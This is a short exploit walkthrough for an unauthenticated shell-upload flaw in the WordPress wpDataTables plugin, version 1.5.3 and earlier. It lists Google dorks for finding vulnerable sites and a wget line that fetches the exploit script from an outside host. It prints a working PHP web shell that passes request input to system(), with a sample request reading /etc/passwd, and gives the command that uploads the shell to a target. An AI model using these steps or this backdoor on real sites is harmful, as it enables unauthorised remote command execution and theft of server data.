#
# Exploit Name: Wordpress wpDataTables 1.5.3 and below Unauthenticated Shell Upload Vulnerability
#                             
# 
# Vulnerability discovered by Claudio Viviani
#
#
# Dork google wordpress:  inurl:/plugins/wpdatatables
#                         inurl:codecanyon-3958969
#                         index of "wpdatatables"
#                         index of "codecanyon-3958969"
#
#
# Tested on BackBox 3.x
#
# Exploit written by:
#
#                    Claudio Viviani
#
#                    http://www.homelab.it
#                    info@homelab.it
#
#                    https://www.facebook.com/homelabit
#                    https://twitter.com/homelabit
#                    https://plus.google.com/+HomelabIt1/
#                    https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww


####################################################################
#
# This video is intended for educational 
# purposes only and the author can not be held liable for 
# any kind of damages done whatsoever to your machine, 
# or damages caused by some other,creative application of this video.
# In any case you disagree with the above statement,stop here.
#
#####################################################################

Wordpress: http://10.0.0.67/wordpress

Php_shell: shell.php

1) Download Exploit

wget http://www.homelab.it/wp-content/uploads/2014/11/wpdatatables_shell_up.py_.txt


2) Create simple php shell.php:

<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>

Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd


4) Run Exploit

python wpdatatables_shell_up.py -t http://10.0.0.67/wordpress -f shell.php
